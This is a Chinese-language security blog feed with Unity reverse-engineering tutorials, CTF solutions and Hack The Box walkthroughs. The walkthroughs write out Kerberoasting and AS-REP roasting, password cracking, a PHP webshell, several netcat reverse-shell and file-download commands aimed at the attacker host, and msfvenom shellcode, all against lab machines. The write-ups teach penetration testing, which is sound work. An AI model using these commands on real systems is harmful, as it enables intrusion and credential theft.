這是用 C# Console 執行以下程式碼的結果，可以得到福壽螺卵

GameObject hori = GameObject.Find("Horizontal");
hori.GetComponent<Rigidbody>().useGravity = false;

當然這只是個演示，拿來做 Inspector 就能做到的事還是大材小用了

Hook 功能也是特別好用，這邊 Hook 掉 OncollisionEnter
只要發生碰撞就把對方 GameObject Destroy 掉

UnityEngine.Object.Destroy(__0.gameObject);

後記

之後應該會繼續寫靶機 Writeup（Hopefully），Unity 第四篇我想找實際的案例所以之後再說差低

Unity 逆向入門第二篇：反編譯

Wed, 24 Jul 2024 00:00:00 GMT

前言

這篇是用 DnSpy 反編譯 Mono Build 的 Unity App
還有用 Il2CppDumper 反編譯 IL2CPP Build

DnSpy 反編譯 Mono Build

一樣用我高一的物理作業當例子

用 DnSpy 打開 Assembly-CSharp.dll (File > Open)

<app目錄>\<app名稱>_Data\Managed\Assembly-CSharp.dll

打開後可以在 Assembly Explorer 看到 ball 這個 Script

反編譯的結果是這樣的：

using System;
using UnityEngine;

// Token: 0x02000002 RID: 2
public class ball : MonoBehaviour
{
	// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
	private void Start()
	{
		Object.Instantiate<GameObject>(this.self);
	}

	// Token: 0x06000002 RID: 2 RVA: 0x00002060 File Offset: 0x00000260
	private void FixedUpdate()
	{
		this.timer += Time.deltaTime;
		if (this.timer >= 0.4f && !this.Grounded)
		{
			this.timer = 0f;
			Object.Instantiate<GameObject>(this.self, base.transform.position, base.transform.rotation);
		}
	}

	// Token: 0x06000003 RID: 3 RVA: 0x000020C1 File Offset: 0x000002C1
	private void OnCollisionEnter(Collision collision)
	{
		this.Grounded = true;
	}

	// Token: 0x04000001 RID: 1
	public GameObject self;

	// Token: 0x04000002 RID: 2
	private float timer;

	// Token: 0x04000003 RID: 3
	private bool Grounded;
}

不能說很像，只能說一模一樣

試玩一下這個 App，按下 Drop 後會放掉球

假設我覺得這個軌跡不夠密集，該怎麼 Patch 呢？

很簡單，對著你想修改的部分按右鍵就好了

原本是每 0.4 秒產生一次，現在我改成每 0.1 秒產生一次

Compile 可能會報錯，照著錯誤訊息修改一下就可以了

成功 Compile 之後可以看到我們做的修改

修改完成後記得要存檔（ctrl + shift + s）

存檔完就可以去看看效果

接下來就可以發揮你的想像力了，例如我想修改球的大小

那結果就會是這樣的

IL2CPP

前面說到如果是 Mono Build 可以直接用 DnSpy，但遊戲廠商也不傻，基本上都會用上 IL2CPP
有的還會加殼，不過那應該可以再寫一篇了

總之想要逆向 IL2CPP 可以用 Il2CppDumper + IDA

Il2CppDumper

執行 Il2CppDumper.exe 依序選擇 GameAssembly.dll 和 global-metadata.dat

<app目錄>\GameAssembly.dll

<app目錄>\<app名稱>_Data\il2cpp_data\Metadata\global-metadata.dat

DnSpy Assembly-CSharp.dll

Il2CppDumper\DummyDll\

可以看到函數名稱和變數等，接下來還需要反編譯出內部邏輯

IDA GameAssembly.dll

<app目錄>\GameAssembly.dll

接下來要用到 ida_with_struct_py3.py 這個腳本

在 IDA 裡按 Alt + F7 或是 File > Script File 選擇腳本

再來是 script.json

最後是 il2cpp.h

成功ㄌ

後記

沒想到 Il2CppDumper 跟 AssetStudio 的作者是同個人

Unity 逆向入門第一篇：開發一個 Unity App

Tue, 23 Jul 2024 00:00:00 GMT

前言

~~HTB 訂閱到期ㄌ，窮困潦倒所以暫時停更~~

先打預防針：這系列只會講很簡單的東西，內容也可能會有錯誤
希望可以拋磚引玉看到更多人分享自己學的東東，不要再內捲偷藏招了XD
如果你對 Unity 逆向有興趣的話就看下去吧 >.0

一個 Unity App 裡面都有些啥

條件允許的話建議還是動手做做看，印象會比較深

這邊就拿我高一的物理作業當例子，來看看一個 Unity App 裡面有哪些東西

總之大概有這些東西：

Scenes（場景）
GameObjects：Scene 裡的物體，Player、Camera 等
Assets：C# script、圖片、模型、材質、Prefab 等

Scene

一個 Unity App 可能會有很多個場景，這個專案只有一個 Sample Scene

Scene 底下會有 GameObject，也就是使用者透過 Camera 可以看到的東西
Canvas 存放的是跟 UI 有關的 GameObject

GameObject

GameObject 底下則是可以有各種 Component

Transform：位置/旋轉/大小
Collider：碰撞體，會和其他 Collider 發生碰撞
Rigidbody：鋼體，代表這個 GameObject 可以受到力量作用
Script

Assets

各種東西都在這

Script

這邊來看 Ball 這個 Script

public class ball : MonoBehaviour
{
    public GameObject self;
    float timer;
    bool Grounded;
    void Start()
    {
        Instantiate(self);
    }
    void FixedUpdate()
    {
        
        timer += Time.deltaTime;
        if(timer >= 0.4f && !Grounded)
        {
            timer = 0;
            Instantiate(self,transform.position,transform.rotation);
        }
    }

    private void OnCollisionEnter(Collision collision)
    {
        Grounded = true;    
    }
}

Start()：Scene 的第一幀會執行 Start()
Update() / FixedUpdate()：開始後每一幀都會執行 Update()，FixedUpdate 解釋起來會比較複雜，可以簡單理解成每秒會執行很多次就好
Instantiate()：生成 GameObject
OnCollision/OnTrigger 系列：發生碰撞時會呼叫的 Function，呼叫時機會因後綴不同而有所不同

看完 Script 就可以知道這個 Ball 大概在幹嘛
--> 開始時生成一次叫做 self 的 GameObject，之後在落地前每隔 0.4 秒生成一次

其他你要知道的事

Mono V.S. IL2CPP

開發完成後需要 Build
接下來講講 Unity 的兩種 Build 方法： Mono、IL2CPP

廢話就不講了，簡單講就是 Mono Build 可以直接用 DnSpy 一刀殺進去，而 IL2CPP 不行
具體來說怎麼用 DnSpy 反編譯就是下一篇的內容了

不過預設選項是 Mono，所以看到是 Unity 就可以 DnSpy 啟動了

CheatEngine

配著用有奇效，但如果用 CE 就能輕易解決的事就不需要搞些花里胡哨的

後記

下篇會是如何反編譯 Mono/IL2CPP Build

AssetStudio 查看 Assets

AssetStudio 可以拿來拆音訊圖片等等的，特定情況可能會需要

Load 遊戲資料夾

不過這個 App 沒什麼能拆，就拿預設的東西當例子
在 Assets List 就可以預覽，右鍵可以導出

[HTB] Active Walkthrough

Tue, 14 May 2024 00:00:00 GMT

前言

這台是 Hack The Box 的 Active，難度是 Easy 也是 AD Track 的第三台

使用到的技巧：

Extract password from Group Policy Preferences XML file
Kerberoasting

Attacker: 10.10.16.6
Target: 10.10.10.100

Recon

nmap

sudo nmap -sV -sC 10.10.10.100

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-14 00:43:40Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -5m10s
| smb2-time: 
|   date: 2024-05-14T00:44:38
|_  start_date: 2024-05-12T14:12:52
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required

值得關注的有 domain, kerberos, ldap 以及 smb

smbclient -N -L \\\\10.10.10.100\\

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
Replication     Disk      
SYSVOL          Disk      Logon server share 
Users           Disk

smbmap -H 10.10.10.100

Disk                        Permissions     Comment
----                        -----------     -------
ADMIN$                      NO ACCESS       Remote Admin
C$                          NO ACCESS       Default share
IPC$                        NO ACCESS       Remote IPC
NETLOGON                    NO ACCESS       Logon server share 
Replication                 READ ONLY
SYSVOL                      NO ACCESS       Logon server share 
Users                       NO ACCESS

Replication 有開匿名

smbclient -N -L \\\\10.10.10.100\\Replication

翻一下到這個路徑拿到 Groups.xml

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml

ldap

ldapsearch -H ldap://10.10.10.100 -x -s base namingcontexts

dn:
namingContexts: DC=active,DC=htb
namingContexts: CN=Configuration,DC=active,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=active,DC=htb
namingContexts: DC=DomainDnsZones,DC=active,DC=htb
namingContexts: DC=ForestDnsZones,DC=active,DC=htb

嘗試 AS-REP-Roasting

impacket-GetNPUsers active.htb/ -dc-ip 10.10.10.100 -request

失敗

Exploit

嘗試用這個工具解出 Groups.xml 密碼
https://github.com/t0thkr1s/gpp-decrypt

嘗試用 evil-winrm 連上主機

evil-winrm -i 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18

失敗了

smbmap + credential 再列舉一次

smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18

再用 smbclient 連上去

smbclient \\\\10.10.10.100\\Users -U SVC_TGS%GPPstillStandingStrong2k18

到桌面就可以拿到 flag 了

Privilege Escalation

有 kerberos，嘗試一下 Kerberoasting

impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

查到這篇
https://github.com/ivanitlearning/CTF-Repos/blob/master/HTB/Sauna/Kerberoasting-HSmith.md

笑死是 AD track 前一台的文

沒想到是跟時間有關

sudo ntpdate 10.10.10.100

重送一次就拿到 password hash 了

用 john + rockyou crack

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

smbclient \\\\10.10.10.100\\Users -U Administrator%Ticketmaster1968

一樣到桌面就拿到 flag 了

後記

終於完成 Tj Null's List 的 PWK V1，總共打了 30 個 box，有些評分太低的我就沒打了
當初參加 CODE 的時候隊友用 Metasploit 很帥，結果現在都在學不用 Metasploit 解題 ==
本來是想一天打一台，結果四個月只打了 30 台，話還是不要說太滿。

[HTB] Buff Walkthrough

Sat, 11 May 2024 00:00:00 GMT

前言

這台是 Hack The Box 的 Buff，難度是 Easy

使用到的技巧：

msfvenom shellcode
chisel port forwarding

Attacker: 10.10.16.3
Target: 10.10.10.134

Recon

nmap

sudo nmap -sV -sC 10.10.10.198

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: mrb3n's Bro Hut
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6

8080 port 上有個網頁

gobuster

gobuster dir -u http://10.10.10.198:8080 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 20

/img                  (Status: 301) [Size: 341] [--> http://10.10.10.198:8080/img/]
/profile              (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/profile/]                                                                          
/upload               (Status: 301) [Size: 344] [--> http://10.10.10.198:8080/upload/]
/license              (Status: 200) [Size: 18025]
/examples             (Status: 503) [Size: 1058]
/include              (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/include/]                                                                                     
/licenses             (Status: 403) [Size: 1203]
/att                  (Status: 301) [Size: 341] [--> http://10.10.10.198:8080/att/]
/%20                  (Status: 403) [Size: 1044]
/ex                   (Status: 301) [Size: 340] [--> http://10.10.10.198:8080/ex/]
/*checkout*           (Status: 403) [Size: 1044]
/boot                 (Status: 301) [Size: 342] [--> http://10.10.10.198:8080/boot/]

沒看到甚麼有趣的

website
看到登入欄位先試 SQLi，但失敗了
逛一下網站看到這個

拿到一個超像亂取名字的 framework

Gym Management Software 1.0

Exploit

查到這個 RCE 腳本
https://www.exploit-db.com/exploits/48506

python2 exploit.py http://10.10.10.198:8080/

直接拿到 user shell 了

彈個 revshell 方便後面提權

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3:8000/nc.exe', 'nc.exe')"

nc.exe -e cmd.exe 10.10.16.3 4444

Privilege Escalation

在 C:\Users\shaun\Downloads 有個 CloudMe_1112.exe

CloudMe 1.11.2 有 BOF 漏洞
https://www.exploit-db.com/exploits/48389
不過現在的 shell code 是打開小算盤 XD
用 netstat 可以看到 PoC 所需的 8888 port 是打開的
（有 service 聽在 127.0.0.1:8888）

照著 exploit 裡附的指令依樣畫葫蘆一下原本是這樣

msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python

修改一下

msfvenom -a x86 -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.16.3 1234' -b '\x00\x0A\x0D' -f python -v payload

-v payload 是指定輸出的變數名稱，我就和 exploit 一樣取 payload

Exploit 準備完成之後還需要做 port forwarding 把 127.0.0.1:8888 轉發出去
這邊用的是 chisel 來做
https://github.com/jpillora/chisel

先上傳 windows 版本到靶機上

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.3:8000/chisel_windows_x64.exe', 'chisel_windows_x64.exe')"

在 kali 上打開 server

./chisel_linux server -p 6666 --reverse

在靶機上轉發 port

.\chisel_windows_x64.exe client 10.10.16.3:6666 R:8888:localhost:8888

執行改過 payload 的腳本之後可以收到 root shell

[HTB] Bastion Walkthrough

Fri, 10 May 2024 00:00:00 GMT

前言

這台是 Hack The Box 的 Bastion，難度是 Easy

使用到的技巧：

Mount smb to kali
Extract password from SAM and SYSTEM (.vhd file)
Insecure mRemoteNG

Attacker: 10.10.16.2
Target: 10.10.10.134

Recon

nmap

sudo nmap -sV -sC 10.10.10.134

PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-05-09T07:55:56+02:00
| smb2-time: 
|   date: 2024-05-09T05:56:00
|_  start_date: 2024-05-09T05:48:18
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -44m56s, deviation: 1h09m16s, median: -4m57s

看起來是要玩 smb

smbclient

先看有哪些 Share

smbclient -N -L \\\\10.10.10.134\\

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
Backups         Disk      
C$              Disk      Default share
IPC$            IPC       Remote IPC

有個 Backups

smbclient -N \\\\10.10.10.134\\Backups

連上之後逛一下找到這個路徑，裡面有兩個 .vhd 檔案，用 get 載下來

smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\>

Exploit

9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd 這個檔案很大
載很久才載完，所以先看這個

7z x 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

直接 segmentation fault
不過有些檔案已經解出來了，但 Windows\System32\config 底下沒有 SAM 跟 SYSTEM
另一個檔案就可以解出來，但沒看到什麼特別的東西

查了一下看到這篇文章
https://infinitelogins.com/2020/12/11/how-to-mount-extract-password-hashes-vhd-files/
照著做嘗試 mount vhd 到 kali 上

sudo apt install libguestfs-tools -y

sudo mkdir /mnt/vhd

guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd

做完之後 /mnt/vhd 還是空的，推測一開始就沒有載完整
嘗試直接從 target mount 過來

sudo mount -t cifs //10.10.10.134/backups /mnt/backups -o user=,password=

成功了！

接下來再 mount vhd

sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd

複製 SAM 跟 SYSTEM 出來

sudo cp vhd/Windows/System32/config/SAM ~/HTB/machine/Bastion

sudo cp vhd/Windows/System32/config/SYSTEM ~/HTB/machine/Bastion

dump 出 password hash

samdump2 SYSTEM SAM

*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

丟 crackstation 拿到 L4mpje 的 password

bureaulampje

拿到 user shell

Privilege Escalation

沒有權限下 systeminfo，開的權限不知道有什麼提權的招

不過 Program Files (x86) 裡面有 mRemoteNG

在 C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml 裡面會有 admin 的 password

<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="50
0e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNF
V5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" H
ostname="127.0.0.1" ......

看起來像 base64 但解出來是亂碼，再查一下找到這個
https://github.com/haseebT/mRemoteNG-Decrypt

用這個腳本解出密碼

連上後取得 admin shell

THJCC CTF Write-ups

Mon, 06 May 2024 00:00:00 GMT

前言

這篇會有我負責的題目的官方解答（預期解）

題目原始碼和解題人數

感覺沒甚麼人解我的題目QQ

⚾

一個棒球小遊戲，可以把關鍵的判斷 patch 掉或是直接跳到 flag()
兩種做法都蠻直觀的，當然也可以直接去逆 flag()，比較麻煩就是了。

只要能進到 miss() 的分支就會呼叫 flag()
簡單反轉兩個條件跳轉指令就可以了

修改後再次執行即可取得 flag

Not Apple

又一個毫無新意的 Android 題目，沒啦想說出個用工具就可以秒解的題目，結果大家都卡在 flag format

jadx 反編譯可以拿到部分 flag，看提示可以知道這裡用了 string resource 的語法

找到對應的 string resource 再替換一下就拿到完整的 flag

flag-decoder

這題是一個用 upx 加殼（壓縮）的 ELF 檔案，但我有做些修改沒辦法直接脫殼

第一步就是先脫殼
upx 的特徵蠻明顯的，還有一些 IDA 的基本操作這邊就不再贅述

大概就是 IDA 跳警告之後 eip 會出現 main() 的形狀
這裡代表已經載入原始的檔案了

接下來把原始的 binary dump 出來

看起來執行結果跟加殼後一樣
脫殼成功後再次用 IDA 分析找到 main()

這邊有 anti-debug 不過直接跳過判斷就好

關鍵是在 sub_401775() 會對 flag 做解密
可以在解密後從 stack 的殘留值取得 flag

再把這裡 dump 下來

會拿到一串 0 跟 1，再到提示給的網站拿到 QR code 掃描一下就拿到 flag 了。

[HTB] Secnotes Walkthrough

Thu, 25 Apr 2024 00:00:00 GMT

前言

這台是 Hack The Box 的 Secnotes，難度是 Medium

使用到的技巧：

SQL injection
Windows php revshell

Attacker: 10.10.16.3
Target: 10.10.10.97

Recon

nmap

sudo nmap -sV -sC 10.10.10.97

PORT     STATE SERVICE      REASON          VERSION
80/tcp   open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp  open  microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: HTB)
8808/tcp open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-04-25T01:48:40
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -4m21s, deviation: 0s, median: -4m21s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 25086/tcp): CLEAN (Timeout)
|   Check 2 (port 11121/tcp): CLEAN (Timeout)
|   Check 3 (port 53444/udp): CLEAN (Timeout)
|   Check 4 (port 11511/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

80 port

先看一下 Web，是個可以寫筆記的網頁，需要註冊帳號，塞一個簡單的 XSS payload 可以收到自己的 cookie

在 Contact Us 功能送一樣的 payload 沒收到東西
只知道有個 tyler@secnotes.htb

路徑也沒掃到什麼，回來玩其他功能
註冊帳號時填入 SQLi payload 可以拿到一組 credential

\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&

Exploit

登入 tyler 的帳號

smbclient -N \\\\10.10.10.97\\new-site -U "tyler%92g\!mA8BGjOirkL%OG*&"

這個 new-site 在 8808 port 上
接下來上傳 nc.exe 跟 php webshell

<?php
system("nc.exe -e cmd.exe 10.10.16.3 4444");
?>

收到 user shell

Privilege Escalation

這個 user 權限有點低，連 systeminfo 都不能用，要另外尋找提權路線

tyler 的桌面上有個 bash.lnk 把它印出來可以看到一個 bash.exe 的路徑

C:\Windows\System32\bash.exe

結果沒辦法執行，過去看發現根本沒這個檔案 ==
用 where.exe 找才知道正確的路徑，有點通靈了

where.exe /R C:\ bash.exe

C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe

執行之後會拿到一個 linux 的 root shell
ls 會看到 smbserver 上的檔案，root 家目錄有個 filesystem
推測應該是做了什麼操作讓 linux 跟 smbserver 共用目錄
用 history 就可以看到

8  mkdir filesystem
9  mount //127.0.0.1/c$ filesystem/
10  sudo apt install cifs-utils
11  mount //127.0.0.1/c$ filesystem/
12  mount //127.0.0.1/c$ filesystem/ -o user=administrator
13  cat /proc/filesystems
14  sudo modprobe cifs
15  smbclient
16  apt install smbclient
17  smbclient
18  smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$

可以看到一組 admin 的 credential
沒意外的話 psexec 可以拿 root shell

impacket-psexec administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97

拿到 root shell

[HTB] Forest Walkthrough

Wed, 24 Apr 2024 00:00:00 GMT

前言

這台是 Hack The Box 的 Forest，難度是 Easy，也是 AD 101 的第一台

使用到的技巧：

ldapsearch
john crack hash
SharpHound + BloodHound CE
DCSync

Attacker: 10.10.16.3
Target: 10.10.10.161

Recon

nmap

sudo nmap -sV -sC 10.10.10.161

PORT      STATE SERVICE      REASON          VERSION
88/tcp    open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-04-22 05:29:52Z)
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?    syn-ack ttl 127
593/tcp   open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack ttl 127
3268/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped   syn-ack ttl 127
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf       syn-ack ttl 127 .NET Message Framing
47001/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49679/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49684/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49707/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49983/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 5597/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 32753/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 51508/udp): CLEAN (Timeout)
|   Check 4 (port 44587/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2024-04-21T22:30:47-07:00
| smb2-time: 
|   date: 2024-04-22T05:30:48
|_  start_date: 2024-04-22T05:05:05
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_clock-skew: mean: 2h22m36s, deviation: 4h02m30s, median: 2m35s

可以知道這台是 htb.local 的 Domain Controller
5985 port 也是開的，推測 WinRM 是打開的

ldapsearch

3268 port 開了 ldap 用 ldapsearch 輔助

ldapsearch -H ldap://10.10.10.161 -x -s base namingcontexts

-x Simple authentication
-s Scope

namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local

接下來用 GetNPUsers

impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -request

可以拿到 svc-alfresco 這個 user 的 password hash

$krb5asrep$23$svc-alfresco@HTB.LOCAL:c5415db6bb764e14a48fb634733aa7e7$c0608bb5a59e8c04a8ab26f187fb054e7be2c2c3ba0c533fb757079b471f5a3be620715925c4b6d914b9fe8e65762e4401b2a45b9d88038f78e63a9e5913c99d803737071d073c0c8085b682e6384c6ae7328e8188cb6d2c462b4b0ccc9fb59a260a901c2bd0651436604359f01ca60806567b4923f9df22ed2f2678d200b609f20ea89a1f0f3ec2e7f89c67a5df6e2a6ed55654bd91505b81ad9eb87ed999a8bf29003ed24eeae0b99e4f8d25763bf2031c2d643375a65cd5d9ee4f276bd96bc7e1da3397a366e2ec58f01a7f700a944784939094fae05d2395e4c7838a015afcd39b77c5fe

接下來用 john + rockyou.txt

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)

Exploit

用取得的 credential 嘗試登入

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

成功取得 User Shell

Privilege Escalation

用 bloodhound 繼續 recon

bloodhound-python -d htb.local -u svc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161

報錯ㄌ，乖乖到 target 上執行，在那之前先開 neo4j 跟 bloodhound

sudo neo4j console

bloodhound

接下來上傳 SharpHound.exe
https://github.com/BloodHoundAD/SharpHound/releases/tag/v2.3.3

certutil.exe -urlcache -split -f http://10.10.16.3:8000/SharpHound.exe

執行 SharpHound

.\SharpHound.exe -c all

會拿到一個 zip 檔

Evil-WinRM 還是挺好用的，可以直接下 download 傳回攻擊機，不用架 smbserver 傳輸

download 20240423174653_BloodHound.zip

把 zip 檔上傳到 BloodHound

Note: 無法上傳可能是版本問題，建議都用最新版的 BloodHound 跟 SharpHound
最新版 BloodHound 使用方法
(登入時 docker exited 可能是你的 RAM 不夠)

wget https://ghst.ly/getbhce -O docker-compose.yml

docker-compose up -d

在 cypher 搜 domain admin 設成 end node，會列出 path 特別牛

但我不知道 CanPSRemote 怎麼利用 QQ
照著 BloodHound 的提示做會報錯

所以把 CanPSRemote 拔掉，再搜尋一次

WriteDACL 可以做 DCSync 攻擊，這樣路線就蠻明確了

